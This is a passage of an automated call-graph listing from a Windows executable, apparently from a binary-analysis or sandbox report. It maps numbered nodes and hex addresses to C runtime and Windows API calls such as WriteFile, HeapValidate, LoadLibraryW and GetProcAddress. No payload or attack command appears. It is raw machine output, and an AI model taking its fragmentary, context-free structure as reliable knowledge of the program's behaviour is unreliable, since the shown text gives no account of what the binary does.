__close 8478->8479 8483 b42207 8478->8483 8479->8453 8480 b42294 8481 b422e1 __close 8480->8481 8482 b4231d 8480->8482 8489 b381d0 __invalid_parameter 11 API calls 8481->8489 8485 b474b0 ___lock_fhandle 3 API calls 8482->8485 8483->8480 8484 b42258 __close 8483->8484 8487 b381d0 __invalid_parameter 11 API calls 8484->8487 8486 b42326 8485->8486 8488 b423f0 __lseeki64_nolock 13 API calls 8486->8488 8490 b42365 __close 8486->8490 8487->8479 8488->8490 8489->8479 8565 b423c4 8490->8565 8495 b4750b 8492->8495 8499 b4755d 8492->8499 8493 b47570 EnterCriticalSection 8494 b4264f 8493->8494 8494->8475 8500 b42710 8494->8500 8496 b47525 InitializeCriticalSectionAndSpinCount 8495->8496 8497 b4753b 8495->8497 8496->8497 8547 b4755f 8497->8547 8499->8493 8499->8494 8501 b4271f ___crtMessageWindowW 8500->8501 8505 b427c0 8501->8505 8506 b42787 __close 8501->8506 8535 b4274a __dosmaperr __close 8501->8535 8502 b3a1a0 ___crtMessageWindowW 5 API calls 8503 b4324c 8502->8503 8503->8475 8504 b42862 8507 b42891 8504->8507 8551 b423f0 8504->8551 8505->8504 8512 b42829 __close 8505->8512 8510 b381d0 __invalid_parameter 11 API calls 8506->8510 8508 b43320 __isatty 11 API calls 8507->8508 8514 b4289d 8508->8514 8510->8535 8511 b42908 8513 b42cd2 8511->8513 8515 b42924 GetConsoleCP 8511->8515 8516 b381d0 __invalid_parameter 11 API calls 8512->8516 8517 b43164 WriteFile 8513->8517 8518 b42cf9 8513->8518 8514->8511 8519 b428cc GetConsoleMode 8514->8519 8541 b42941 __write_nolock 8515->8541 8516->8535 8521 b431a5 GetLastError 8517->8521 8517->8535 8520 b42e4b 8518->8520 8529 b42d0c 8518->8529 8519->8511 8528 b42f9b 8520->8528 8531 b42e58 8520->8531 8521->8535 8522 b42dd6 WriteFile 8524 b42e36 GetLastError 8522->8524 8522->8529 8523 b42f26 WriteFile 8530 b42f86 GetLastError 8523->8530 8523->8531 8524->8535 8525 b42b3d WideCharToMultiByte 8532 b42b69 WriteFile 8525->8532 8525->8535 8526 b4306e WideCharToMultiByte 8527 b430b5 GetLastError 8526->8527 8526->8528 8527->8535 8528->8526 8534 b430d2 WriteFile 8528->8534 8528->8535 8529->8522 8529->8535 8530->8535 8531->8523 8531->8535 8533 b42bb6 GetLastError 8532->8533 8532->8541 8533->8535 8534->8528 8536 b43128 GetLastError 8534->8536 8535->8502 8536->8528 8537 b46f40 MultiByteToWideChar MultiByteToWideChar __fassign 8537->8541 8538 b42c70 GetLastError 8538->8535 8539 b42bca WriteFile 8540 b42c28 GetLastError 8539->8540 8539->8541 8540->8535 8541->8525 8541->8535 8541->8537 8541->8538 8541->8539 8542 b475e0 WriteConsoleW CreateFileW __putwch_nolock 8541->8542 8543 b42cbd GetLastError 8541->8543 8542->8541 8543->8535 8564 b475b0 LeaveCriticalSection 8544->8564 8546 b426e8 8546->8477 8550 b37dc0 LeaveCriticalSection 8547->8550 8549 b47566 8549->8499 8550->8549 8557 b47340 8551->8557 8553 b4240d 8554 b42454 SetFilePointer 8553->8554 8556 b42419 __dosmaperr 8553->8556 8555 b42473 GetLastError 8554->8555 8554->8556 8555->8556 8556->8507 8558 b4736c 8557->8558 8559 b4734e __close 8557->8559 8560 b473c0 __close 8558->8560 8562 b473fc __close 8558->8562 8559->8553 8561 b381d0 __invalid_parameter 11 API calls 8560->8561 8561->8559 8562->8559 8563 b381d0 __invalid_parameter 11 API calls 8562->8563 8563->8559 8564->8546 8568 b475b0 LeaveCriticalSection 8565->8568 8567 b423cd 8567->8479 8568->8567 9227 b40b10 9228 b40b45 9227->9228 9229 b40b23 9227->9229 9230 b40b70 _xtow_s@20 11 API calls 9228->9230 9229->9228 9231 b40b29 9229->9231 9232 b40b40 9230->9232 9234 b40b70 9231->9234 9235 b40b8a 9234->9235 9236 b40bde 9235->9236 9237 b40bae 9235->9237 9238 b40c10 9236->9238 9242 b40c40 _memset 9236->9242 9239 b381d0 __invalid_parameter 11 API calls 9237->9239 9240 b381d0 __invalid_parameter 11 API calls 9238->9240 9247 b40bd1 9239->9247 9240->9247 9241 b40cd1 9244 b381d0 __invalid_parameter 11 API calls 9241->9244 9242->9241 9243 b40d01 9242->9243 9245 b40d4d 9243->9245 9248 b40d7d 9243->9248 9244->9247 9246 b381d0 __invalid_parameter 11 API calls 9245->9246 9246->9247 9247->9232 9248->9247 9249 b381d0 __invalid_parameter 11 API calls 9248->9249 9249->9247 9250 b45310 9255 b452e0 9250->9255 9253 b45332 9254 b45570 delete LeaveCriticalSection 9254->9253 9258 b47a50 9255->9258 9261 b47a89 type_info::_Type_info_dtor 9258->9261 9262 b47b3b 9261->9262 9265 b37dc0 LeaveCriticalSection 9262->9265 9264 b452fb 9264->9253 9264->9254 9265->9264 8164 b3281e 8165 b32824 8164->8165 8166 b32829 8164->8166 8167 b328e0 _atexit LeaveCriticalSection 8165->8167 8167->8166 8168 b35000 8169 b35040 8168->8169 8170 b350c1 8169->8170 8171 b35091 8169->8171 8175 b35126 8170->8175 8172 b381d0 __invalid_parameter 11 API calls 8171->8172 8174 b350b7 8172->8174 8178 b37dc0 LeaveCriticalSection 8175->8178 8177 b3512d 8177->8174 8178->8177 7888 b32900 7893 b35ad0 RtlEncodePointer 7888->7893 7890 b3290b __initp_misc_winsig __init_pointers 7894 b36810 EncodePointer 7890->7894 7892 b32953 7893->7890 7894->7892 8569 b3e980 RtlUnwind 8570 b38580 8571 b3858f ___crtMessageWindowW 8570->8571 8572 b385b7 GetModuleFileNameW 8571->8572 8593 b385ad 8571->8593 8573 b385d8 8572->8573 8579 b3860d _wcslen 8572->8579 8574 b38980 _wcscpy_s 11 API calls 8573->8574 8576 b38604 8574->8576 8575 b3a1a0 ___crtMessageWindowW 5 API calls 8577 b3897b 8575->8577 8578 b32e70 __invoke_watson_if_error 10 API calls 8576->8578 8578->8579 8583 b38687 _wcslen 8579->8583 8596 b3ca80 8579->8596 8581 b3867e 8582 b32e70 __invoke_watson_if_error 10 API calls 8581->8582 8582->8583 8606 b3ca50 8583->8606 8585 b388a5 8588 b388d8 8585->8588 8609 b359e0 8585->8609 8587 b38923 8589 b3a3d0 ___crtMessageBoxW 22 API calls 8587->8589 8588->8587 8590 b38980 _wcscpy_s 11 API calls 8588->8590 8591 b3893c 8589->8591 8592 b3891a 8590->8592 8591->8593 8595 b37e10 _raise 14 API calls 8591->8595 8594 b32e70 __invoke_watson_if_error 10 API calls 8592->8594 8593->8575 8594->8587 8595->8593 8597 b3ca95 8596->8597 8599 b3ca8e _memmove 8596->8599 8598 b3cacb 8597->8598 8601 b3cafb _memset 8597->8601 8600 b381d0 __invalid_parameter 11 API calls 8598->8600 8599->8581 8600->8599 8601->8599 8602 b3cb55 8601->8602 8604 b3cb82 8601->8604 8603 b381d0 __invalid_parameter 11 API calls 8602->8603 8603->8599 8604->8599 8605 b381d0 __invalid_parameter 11 API calls 8604->8605 8605->8599 8607 b419e0 __vsnwprintf_s_l 40 API calls 8606->8607 8608 b3ca77 8607->8608 8608->8585 8610 b359eb 8609->8610 8611 b359fb 8609->8611 8610->8611 8612 b38230 __invoke_watson 10 API calls 8610->8612 8611->8588 8612->8611 8179 b2980d 8180 b29d64 LocalAlloc 8179->8180 8181 b2b00f 8180->8181 8181->8181 7839 b2caf0 7843 b282c0 7839->7843 7842 b2cfc5 7844 b282db GetProcAddress LocalFree 7843->7844 7844->7842 9077 b35af0 TlsGetValue 9078 b35b2b 9077->9078 9079 b35b0b DecodePointer TlsSetValue 9077->9079 9079->9078 9102 b47e70 9103 b47e93 9102->9103 9104 b47e7e 9102->9104 9104->9103 9105 b47e87 CloseHandle 9104->9105 9105->9103 9266 b43b70 9267 b43bc5 9266->9267 9268 b43c54 9267->9268 9269 b43c0e 9267->9269 9270 b436b0 __fileno 11 API calls 9268->9270 9272 b43c7b 9268->9272 9271 b381d0 __invalid_parameter 11 API calls 9269->9271 9270->9272 9278 b43c34 _LocaleUpdate::~_LocaleUpdate 9271->9278 9273 b43d83 9272->9273 9274 b43dc9 9272->9274 9276 b381d0 __invalid_parameter 11 API calls 9273->9276 9275 b43e0b 9274->9275 9291 b43e51 _get_int_arg _get_short_arg __chvalidator_l _strlen __isleadbyte_l 9274->9291 9279 b381d0 __invalid_parameter 11 API calls 9275->9279 9276->9278 9277 b3a1a0 ___crtMessageWindowW 5 API calls 9280 b44e75 9277->9280 9278->9277 9279->9278 9281 b44da7 9281->9278 9282 b381d0 __invalid_parameter 11 API calls 9281->9282 9282->9278 9283 b43f77 9284 b381d0 __invalid_parameter 11 API calls 9283->9284 9284->9278 9285 b44f80 40 API calls _write_char 9285->9291 9286 b447c9 DecodePointer 9286->9291 9287 b44079 9290 b381d0 __invalid_parameter 11 API calls 9287->9290 9288 b45030 40 API calls _write_multi_char 9288->9291 9289 b43a50 13 API calls _wctomb_s 9289->9291 9290->9278 9291->9281 9291->9283 9291->9285 9291->9286 9291->9287 9291->9288 9291->9289 9292 b44813 DecodePointer 9291->9292 9293 b44848 DecodePointer 9291->9293 9294 b45070 40 API calls _write_string 9291->9294 9292->9291 9293->9291 9294->9291 9295 b45370 9296 b45381 std::bad_exception::~bad_exception 9295->9296 9297 b45392 9296->9297 9298 b45570 delete LeaveCriticalSection 9296->9298 9298->9297 8182 b3b060 8183 b3a1a0 ___crtMessageWindowW 5 API calls 8182->8183 8184 b3b075 8183->8184 8187 b3eac0 8184->8187 8189 b3eacd 8187->8189 8188 b3eb1d 8193 b3b09f 8188->8193 8194 b3f430 8188->8194 8189->8188 8192 b3eb51 8189->8192 8189->8193 8192->8193 8200 b3ec20 8192->8200 8195 b3f471 __CallSettingFrame@12 8194->8195 8197 b3f54f ___FrameUnwindToState 8195->8197 8240 b368e0 DecodePointer 8195->8240 8198 b3f58e 8197->8198 8199 b368e0 FindHandlerForForeignException 35 API calls 8197->8199 8198->8193 8199->8198 8201 b3ec3c 8200->8201 8202 b368e0 FindHandlerForForeignException 35 API calls 8201->8202 8203 b3ec70 _ValidateRead 8201->8203 8202->8203 8205 b3ed9c 8203->8205 8212 b3ecd6 8203->8212 8217 b368e0 FindHandlerForForeignException 35 API calls 8203->8217 8218 b3ed0d 8203->8218 8204 b3f05e 8206 b3f099 8204->8206 8207 b3f06f 8204->8207 8211 b3f03d 8204->8211 8205->8204 8208 b3ee25 8205->8208 8210 b36830 FindHandler 34 API calls 8206->8210 8315 b3f170 8207->8315 8215 b3ef5d ___DestructExceptionObject 8208->8215 8288 b3b250 8208->8288 8210->8211 8211->8212 8214 b368e0 FindHandlerForForeignException 35 API calls 8211->8214 8212->8193 8214->8212 8215->8211 8216 b3fdf0 IsInExceptionSpec 35 API calls 8215->8216 8221 b3efb3 8216->8221 8217->8218 8222 b368e0 FindHandlerForForeignException 35 API calls 8218->8222 8225 b3ed5a 8218->8225 8219 b3ee4b ___TypeMatch 8219->8215 8294 b3f5b0 8219->8294 8221->8211 8223 b3efff 8221->8223 8224 b3f00e 8221->8224 8222->8225 8305 b3af50 RtlUnwind 8223->8305 8306 b3af50 RtlUnwind 8224->8306 8225->8205 8276 b3fdf0 8225->8276 8228 b3f00c 8230 b3f430 ___FrameUnwindToState 35 API calls 8228->8230 8231 b3f02e 8230->8231 8307 b3feb0 8231->8307 8233 b3ed92 Is_bad_exception_allowed 8233->8205 8234 b3edb1 ___DestructExceptionObject 8233->8234 8235 b3eddc 8233->8235 8282 b3f0c0 8234->8282 8236 b36830 FindHandler 34 API calls 8235->8236 8236->8205 8243 b3692a 8240->8243 8244 b36830 8243->8244 8246 b3686a 8244->8246 8248 b3ae80 8246->8248 8247 b3689e 8247->8195 8249 b3ae97 8248->8249 8252 b3ae9e 8248->8252 8250 b364d0 __NMSG_WRITE 31 API calls 8249->8250 8250->8252 8258 b38180 DecodePointer 8252->8258 8253 b3aea6 8254 b3aeb6 8253->8254 8259 b37e10 8253->8259 8255 b3aed2 8254->8255 8257 b38260 __call_reportfault 8 API calls 8254->8257 8255->8247 8257->8255 8258->8253 8263 b37e69 8259->8263 8260 b37e7a 8261 b37fa4 DecodePointer 8260->8261 8264 b37eee _raise 8261->8264 8262 b37f73 8265 b381d0 __invalid_parameter 11 API calls 8262->8265 8263->8260 8263->8261 8263->8262 8263->8264 8267 b38026 8264->8267 8269 b37efc 8264->8269 8270 b35ad0 RtlEncodePointer 8264->8270 8265->8269 8271 b3807a 8267->8271 8269->8254 8270->8267 8272 b38080 8271->8272 8273 b38087 8271->8273 8275 b37dc0 LeaveCriticalSection 8272->8275 8273->8269 8275->8273 8277 b3fe00 8276->8277 8278 b3fdfe 8276->8278 8279 b368e0 FindHandlerForForeignException 35 API calls 8277->8279 8280 b36830 FindHandler 34 API calls 8278->8280 8281 b3fe10 ___TypeMatch 8278->8281 8279->8278 8280->8281 8281->8233 8325 b453a0 8282->8325 8285 b45280 8286 b452bc RaiseException 8285->8286 8287 b452ab 8285->8287 8286->8205 8287->8286 8289 b3b2a4 8288->8289 8293 b3b26f 8288->8293 8290 b3b2c0 8289->8290 8291 b368e0 FindHandlerForForeignException 35 API calls 8289->8291 8290->8219 8291->8290 8292 b368e0 FindHandlerForForeignException 35 API calls 8292->8293 8293->8289 8293->8292 8295 b3f5c4 8294->8295 8296 b3f5d9 8294->8296 8342 b3fbe0 8295->8342 8298 b3f5e2 8296->8298 8299 b3f5f1 8296->8299 8346 b3af50 RtlUnwind 8298->8346 8347 b3af50 RtlUnwind 8299->8347 8302 b3f5ef 8303 b3f430 ___FrameUnwindToState 35 API calls 8302->8303 8304 b3f615 CatchIt CallCatchBlock 8303->8304 8304->8219 8305->8228 8306->8228 8308 b3fee0 8307->8308 8309 b3fee9 8308->8309 8310 b368e0 FindHandlerForForeignException 35 API calls 8308->8310 8361 b368b0 8309->8361 8310->8309 8313 b36830 FindHandler 34 API calls 8314 b3ff2e 8313->8314 8314->8211 8317 b3f189 8315->8317 8323 b3f184 8315->8323 8316 b3f1f7 8319 b3b250 _GetRangeOfTrysToCheck 35 API calls 8316->8319 8322 b3f1a3 _CallSETranslator 8317->8322 8365 b35ad0 RtlEncodePointer 8317->8365 8318 b368e0 FindHandlerForForeignException 35 API calls 8318->8316 8321 b3f217 8319->8321 8321->8323 8324 b3f5b0 CatchIt 36 API calls 8321->8324 8322->8316 8322->8318 8322->8323 8323->8211 8324->8321 8328 b454c0 8325->8328 8329 b3edcc 8328->8329 8330 b454d1 _malloc _strlen 8328->8330 8329->8285 8330->8329 8332 b3d060 8330->8332 8335 b3d06e 8332->8335 8333 b3d0e4 _memset 8337 b3d179 8333->8337 8340 b3d1a9 _memset 8333->8340 8334 b3d0b4 8336 b381d0 __invalid_parameter 11 API calls 8334->8336 8335->8333 8335->8334 8339 b3d0d7 _memset 8336->8339 8338 b381d0 __invalid_parameter 11 API calls 8337->8338 8338->8339 8339->8329 8340->8339 8341 b381d0 __invalid_parameter 11 API calls 8340->8341 8341->8339 8343 b3fc22 8342->8343 8348 b3f970 8343->8348 8345 b3fc56 ___DestructExceptionObject ___AdjustPointer 8345->8296 8346->8302 8347->8302 8349 b3f9b5 8348->8349 8359 b3f9d8 ___BuildCatchObjectHelper ___AdjustPointer 8348->8359 8350 b3fa6d 8349->8350 8352 b3fa15 _ValidateRead 8349->8352 8349->8359 8351 b3faef 8350->8351 8353 b3fa77 _ValidateRead 8350->8353 8356 b3faf8 _ValidateRead 8351->8356 8360 b3fb52 _ValidateRead 8351->8360 8354 b368e0 FindHandlerForForeignException 35 API calls 8352->8354 8352->8359 8355 b368e0 FindHandlerForForeignException 35 API calls 8353->8355 8353->8359 8354->8359 8355->8359 8358 b368e0 FindHandlerForForeignException 35 API calls 8356->8358 8356->8359 8357 b368e0 FindHandlerForForeignException 35 API calls 8357->8359 8358->8359 8359->8345 8360->8357 8360->8359 8362 b368bb 8361->8362 8363 b36830 FindHandler 34 API calls 8362->8363 8364 b368cf 8363->8364 8364->8313 8365->8322 8613 b391e0 8614 b391ef ___crtMessageWindowW 8613->8614 8615 b39217 GetModuleFileNameA 8614->8615 8616 b3920d 8614->8616 8617 b39236 8615->8617 8623 b3926b _strlen 8615->8623 8619 b3a1a0 ___crtMessageWindowW 5 API calls 8616->8619 8618 b3d060 _wcscpy_s 11 API calls 8617->8618 8621 b39262 8618->8621 8620 b395d6 8619->8620 8622 b32e70 __invoke_watson_if_error 10 API calls 8621->8622 8622->8623 8624 b3ca80 _memcpy_s 11 API calls 8623->8624 8627 b392e2 _strlen 8623->8627 8625 b392d9 8624->8625 8626 b32e70 __invoke_watson_if_error 10 API calls 8625->8626 8626->8627 8639 b39fa0 8627->8639 8629 b39500 8630 b359e0 __invoke_watson_if_oneof 10 API calls 8629->8630 8632 b39533 8629->8632 8630->8632 8631 b3957e 8642 b3ce40 8631->8642 8632->8631 8633 b3d060 _wcscpy_s 11 API calls 8632->8633 8635 b39575 8633->8635 8637 b32e70 __invoke_watson_if_error 10 API calls 8635->8637 8637->8631 8638 b37e10 _raise 14 API calls 8638->8616 8660 b3e390 8639->8660 8641 b39fc7 8641->8629 8685 b35ad0 RtlEncodePointer 8642->8685 8644 b3ce5e 8645 b3ce83 LoadLibraryW 8644->8645 8646 b3cf47 8644->8646 8647 b3ce9e GetProcAddress 8645->8647 8655 b3ce97 8645->8655 8649 b3cf5d DecodePointer DecodePointer 8646->8649 8659 b3cf82 8646->8659 8648 b3cebd 7 API calls 8647->8648 8647->8655 8648->8646 8652 b3cf2c GetProcAddress EncodePointer 8648->8652 8649->8659 8650 b3d024 DecodePointer 8650->8655 8651 b3a1a0 ___crtMessageWindowW 5 API calls 8656 b39597 8651->8656 8652->8646 8653 b3cfee 8653->8650 8657 b3d004 DecodePointer 8653->8657 8654 b3cfd8 DecodePointer 8654->8653 8655->8651 8656->8616 8656->8638 8657->8650 8658 b3cfc0 8657->8658 8658->8650 8659->8653 8659->8654 8659->8658 8661 b3e3b8 8660->8661 8662 b3e3df 8661->8662 8666 b3e410 8661->8666 8663 b381d0 __invalid_parameter 11 API calls 8662->8663 8672 b3e405 _memset 8663->8672 8664 b3e4a9 8667 b3e4b5 8664->8667 8668 b3e56c 8664->8668 8665 b3e478 8669 b381d0 __invalid_parameter 11 API calls 8665->8669 8666->8664 8666->8665 8666->8672 8675 b3df30 8667->8675 8670 b3df30 __vsnprintf_helper 40 API calls 8668->8670 8669->8672 8673 b3e4e0 _memset 8670->8673 8672->8641 8673->8672 8674 b381d0 __invalid_parameter 11 API calls 8673->8674 8674->8672 8677 b3df6e 8675->8677 8676 b3df92 8679 b381d0 __invalid_parameter 11 API calls 8676->8679 8677->8676 8678 b3dfc0 8677->8678 8680 b3e00c 8678->8680 8683 b3e03a 8678->8683 8682 b3dfb5 8679->8682 8681 b381d0 __invalid_parameter 11 API calls 8680->8681 8681->8682 8682->8673 8683->8682 8684 b3dc10 __flsbuf 40 API calls 8683->8684 8684->8682 8685->8644 9106 b32260 9107 b322ba 9106->9107 9108 b32272 9106->9108 9108->9107 9109 b36830 FindHandler 34 API calls 9108->9109 9109->9107 9080 b35ae0 TlsAlloc 9081 b37ae0 9083 b37af8 9081->9083 9082 b37b4d 9083->9082 9084 b37b14 InitializeCriticalSectionAndSpinCount 9083->9084 9084->9082 9084->9083 9299 b36b60 9300 b33d00 9299->9300 9301 b36b7b EncodePointer 9300->9301 9302 b36ba2 9301->9302 9125 b297e6 9126 b29818 9125->9126 9129 b2970f 9125->9129 9127 b29d64 LocalAlloc 9126->9127 9126->9129 9128 b2b00f 9127->9128 9128->9128 9129->9129 7845 b32cd0 7846 b32cf5 _wcslen 7845->7846 7847 b32ced 7845->7847 7846->7847 7850 b38980 7846->7850 7860 b32e70 7846->7860 7852 b3898e 7850->7852 7851 b389d4 7864 b381d0 DecodePointer 7851->7864 7852->7851 7856 b38a04 _memset 7852->7856 7854 b389f7 _memset 7854->7846 7855 b38acd _memset 7855->7854 7859 b381d0 __invalid_parameter 11 API calls 7855->7859 7856->7855 7857 b38a9d 7856->7857 7858 b381d0 __invalid_parameter 11 API calls 7857->7858 7858->7854 7859->7854 7861 b32e7b 7860->7861 7862 b32e7d 7860->7862 7861->7846 7863 b38230 __invoke_watson 10 API calls 7862->7863 7863->7861 7865 b3820d 7864->7865 7867 b381f1 7864->7867 7868 b38230 7865->7868 7867->7854 7871 b38260 7868->7871 7872 b3827b _memset __call_reportfault 7871->7872 7873 b382a1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7872->7873 7874 b38389 __call_reportfault 7873->7874 7877 b3a1a0 7874->7877 7876 b38243 GetCurrentProcess TerminateProcess 7876->7867 7878 b3a1aa IsDebuggerPresent 7877->7878 7879 b3a1a8 7877->7879 7885 b395f0 7878->7885 7879->7876 7882 b3e93f SetUnhandledExceptionFilter UnhandledExceptionFilter 7883 b3e968 GetCurrentProcess TerminateProcess 7882->7883 7884 b3e95e __call_reportfault 7882->7884 7883->7876 7884->7883 7885->7882 7886 b361d0 HeapCreate 7887 b361fa 7886->7887 7906 b323d0 7908 b323df __IsNonwritableInCurrentImage 7906->7908 7912 b36bc0 7908->7912 7909 b32402 __initterm_e 7911 b3241d __IsNonwritableInCurrentImage __initterm 7909->7911 7916 b36b40 7909->7916 7915 b36bcf 7912->7915 7913 b36bfb 7913->7909 7914 b36bde RtlEncodePointer 7914->7915 7915->7913 7915->7914 7919 b36970 7916->7919 7920 b369a7 _atexit 7919->7920 7925 b369f0 DecodePointer DecodePointer 7920->7925 7926 b36a1f 7925->7926 7927 b369b7 7925->7927 7926->7927 7939 b34960 7926->7939 7936 b369cb 7927->7936 7929 b36b03 EncodePointer EncodePointer 7929->7927 7931 b36a96 7931->7927 7933 b33d60 __realloc_dbg 48 API calls 7931->7933 7934 b36adc EncodePointer 7931->7934 7935 b36acc 7933->7935 7934->7929 7935->7927 7935->7934 8137 b328e0 7936->8137 7940 b349a4 7939->7940 7941 b349cb 7940->7941 7942 b349fc 7940->7942 7944 b381d0 __invalid_parameter 11 API calls 7941->7944 7946 b34a1b 7942->7946 7956 b34b90 7942->7956 7949 b349f1 7944->7949 7962 b35160 7946->7962 7947 b34a75 7966 b34b26 7947->7966 7949->7929 7949->7931 7950 b33d60 7949->7950 7951 b33d99 7950->7951 7976 b33e00 7951->7976 7953 b33dbe 7987 b33dd2 7953->7987 7957 b34bd6 7956->7957 7960 b34bcc 7956->7960 7969 b398c0 HeapValidate 7957->7969 7960->7946 7961 b34bec _CheckBytes 7971 b34fb5 7961->7971 7963 b3516b 7962->7963 7964 b3516f __CrtIsValidHeapPointer 7962->7964 7963->7947 7964->7963 7965 b3518a HeapValidate 7964->7965 7965->7963 7975 b37dc0 LeaveCriticalSection 7966->7975 7968 b34b2d 7968->7949 7970 b398e1 7969->7970 7970->7961 7974 b37dc0 LeaveCriticalSection 7971->7974 7973 b34fbc 7973->7960 7974->7973 7975->7968 7977 b33e3a 7976->7977 7986 b33e1d _memset 7976->7986 7978 b34b90 __CrtCheckMemory 2 API calls 7977->7978 7980 b33e7c _CheckBytes 7977->7980 7977->7986 7978->7980 7979 b35160 __CrtIsValidHeapPointer HeapValidate 7981 b3408a 7979->7981 7980->7979 7980->7986 7982 b34173 7981->7982 7983 b34198 7981->7983 7981->7986 7990 b39770 7982->7990 8005 b39610 7983->8005 7986->7953 8136 b37dc0 LeaveCriticalSection 7987->8136 7989 b33dd0 7989->7931 7991 b39796 7990->7991 7992 b39785 7990->7992 7994 b3979c 7991->7994 7999 b397af 7991->7999 8016 b39080 7992->8016 8023 b39870 7994->8023 7996 b397e5 8027 b383c0 DecodePointer 7996->8027 7998 b397c9 HeapReAlloc 7998->7999 7999->7996 7999->7998 8000 b3980f 7999->8000 8003 b383c0 __callnewh DecodePointer 7999->8003 8004 b39844 GetLastError 7999->8004 8001 b39817 GetLastError 8000->8001 8002 b3978e __free_base 8000->8002 8001->8002 8002->7986 8003->7999 8004->8002 8008 b3962b 8005->8008 8006 b3964f 8011 b381d0 __invalid_parameter 11 API calls 8006->8011 8007 b3967c 8009 b3969e HeapSize HeapReAlloc 8007->8009 8013 b39672 __free_base 8007->8013 8008->8006 8008->8007 8010 b396d2 8009->8010 8009->8013 8012 b396f4 GetLastError 8010->8012 8134 b39720 HeapQueryInformation 8010->8134 8011->8013 8012->8013 8013->7986 8017 b390d6 8016->8017 8022 b39093 8016->8022 8018 b383c0 __callnewh DecodePointer 8017->8018 8021 b390a8 8018->8021 8020 b383c0 __callnewh DecodePointer 8020->8022 8021->8002 8022->8020 8022->8021 8029 b39110 8022->8029 8024 b39886 HeapFree 8023->8024 8025 b39884 __free_base 8023->8025 8024->8025 8026 b398a2 GetLastError 8024->8026 8025->8002 8026->8025 8028 b383db 8027->8028 8028->8002 8030 b3913b RtlAllocateHeap 8029->8030 8031 b3911f 8029->8031 8030->8022 8039 b36430 8031->8039 8086 b3a310 8039->8086 8042 b3644b 8044 b364d0 __NMSG_WRITE 31 API calls 8042->8044 8046 b36472 8042->8046 8043 b3a310 __set_error_mode 11 API calls 8043->8042 8045 b36465 8044->8045 8047 b364d0 __NMSG_WRITE 31 API calls 8045->8047 8048 b364d0 8046->8048 8047->8046 8054 b364ee __GET_RTERRMSG 8048->8054 8049 b36616 8050 b3a1a0 ___crtMessageWindowW 5 API calls 8049->8050 8051 b367fd 8050->8051 8083 b328a0 8051->8083 8052 b3a310 __set_error_mode 11 API calls 8053 b3656d 8052->8053 8055 b36594 GetStdHandle 8053->8055 8056 b3a310 __set_error_mode 11 API calls 8053->8056 8054->8049 8054->8052 8055->8049 8059 b365a5 _strlen 8055->8059 8057 b3657c 8056->8057 8057->8055 8058 b3661b 8057->8058 8058->8049 8060 b38980 _wcscpy_s 11 API calls 8058->8060 8059->8049 8061 b36601 WriteFile 8059->8061 8062 b36682 8060->8062 8061->8049 8063 b32e70 __invoke_watson_if_error 10 API calls 8062->8063 8064 b3668b GetModuleFileNameW 8063->8064 8065 b366b5 8064->8065 8070 b366ec _wcslen 8064->8070 8066 b38980 _wcscpy_s 11 API calls 8065->8066 8067 b366e3 8066->8067 8068 b32e70 __invoke_watson_if_error 10 API calls 8067->8068 8068->8070 8069 b3676e 8100 b3a5f0 8069->8100 8070->8069 8090 b3a9e0 8070->8090 8072 b3679b 8073 b32e70 __invoke_watson_if_error 10 API calls 8072->8073 8075 b367a4 8073->8075 8077 b3a5f0 _wcscat_s 11 API calls 8075->8077 8076 b36765 8078 b32e70 __invoke_watson_if_error 10 API calls 8076->8078 8079 b367d0 8077->8079 8078->8069 8080 b32e70 __invoke_watson_if_error 10 API calls 8079->8080 8081 b367d9 8080->8081 8113 b3a3d0 8081->8113 8131 b32860 GetModuleHandleW 8083->8131 8087 b3a32b 8086->8087 8088 b381d0 __invalid_parameter 11 API calls 8087->8088 8089 b3643c 8087->8089 8088->8089 8089->8042 8089->8043 8091 b3a9ee 8090->8091 8092 b3aa4d 8091->8092 8095 b3aa7d _memset 8091->8095 8097 b3a9fa _memset 8091->8097 8093 b381d0 __invalid_parameter 11 API calls 8092->8093 8093->8097 8094 b3ab7b 8096 b381d0 __invalid_parameter 11 API calls 8094->8096 8095->8094 8095->8097 8098 b3abab _memset _wcsncpy_s 8095->8098 8096->8097 8097->8076 8098->8097 8099 b381d0 __invalid_parameter 11 API calls 8098->8099 8099->8097 8102 b3a5fe 8100->8102 8101 b3a644 8103 b381d0 __invalid_parameter 11 API calls 8101->8103 8102->8101 8105 b3a674 _memset 8102->8105 8108 b3a667 _memset 8103->8108 8104 b3a70d 8106 b381d0 __invalid_parameter 11 API calls 8104->8106 8105->8104 8107 b3a73d _memset 8105->8107 8106->8108 8109 b3a81d 8107->8109 8111 b3a84d _memset 8107->8111 8108->8072 8110 b381d0 __invalid_parameter 11 API calls 8109->8110 8110->8108 8111->8108 8112 b381d0 __invalid_parameter 11 API calls 8111->8112 8112->8108 8114 b35ad0 FindHandlerForForeignException RtlEncodePointer 8113->8114 8115 b3a3ee 8114->8115 8116 b3a413 LoadLibraryW 8115->8116 8117 b3a4d7 8115->8117 8118 b3a42e GetProcAddress 8116->8118 8127 b3a427 8116->8127 8121 b3a4ed DecodePointer DecodePointer 8117->8121 8130 b3a512 8117->8130 8119 b3a44d 7 API calls 8118->8119 8118->8127 8119->8117 8124 b3a4bc GetProcAddress EncodePointer 8119->8124 8120 b3a550 8122 b3a5b4 DecodePointer 8120->8122 8121->8130 8122->8127 8123 b3a1a0 ___crtMessageWindowW 5 API calls 8128 b3a5ec 8123->8128 8124->8117 8125 b3a57e 8125->8122 8129 b3a594 DecodePointer 8125->8129 8126 b3a568 DecodePointer 8126->8125 8127->8123 8128->8049 8129->8120 8129->8122 8130->8120 8130->8125 8130->8126 8132 b32894 ExitProcess 8131->8132 8133 b3287c GetProcAddress 8131->8133 8133->8132 8135 b396e8 8134->8135 8135->8012 8135->8013 8136->7989 8140 b37dc0 LeaveCriticalSection 8137->8140 8139 b328ec 8139->7911 8140->8139 9183 b3e7d0 9184 b3e80e 9183->9184 9188 b3e842 9183->9188 9185 b39e20 __updatetlocinfoEx_nolock 16 API calls 9184->9185 9186 b3e82e 9185->9186 9189 b3e844 9186->9189 9192 b37dc0 LeaveCriticalSection 9189->9192 9191 b3e84b 9191->9188 9192->9191 8760 b3cd50 IsProcessorFeaturePresent 9130 b353d0 9131 b353eb __chvalidator_l 9130->9131 9134 b35530 9131->9134 9133 b353fd _LocaleUpdate::~_LocaleUpdate 9137 b35570 __CrtIsValidHeapPointer 9134->9137 9136 b357f8 9136->9133 9138 b3562f IsBadReadPtr 9137->9138 9139 b35642 9137->9139 9149 b3560a 9137->9149 9138->9139 9140 b35749 9139->9140 9143 b356c6 9139->9143 9141 b35752 9140->9141 9142 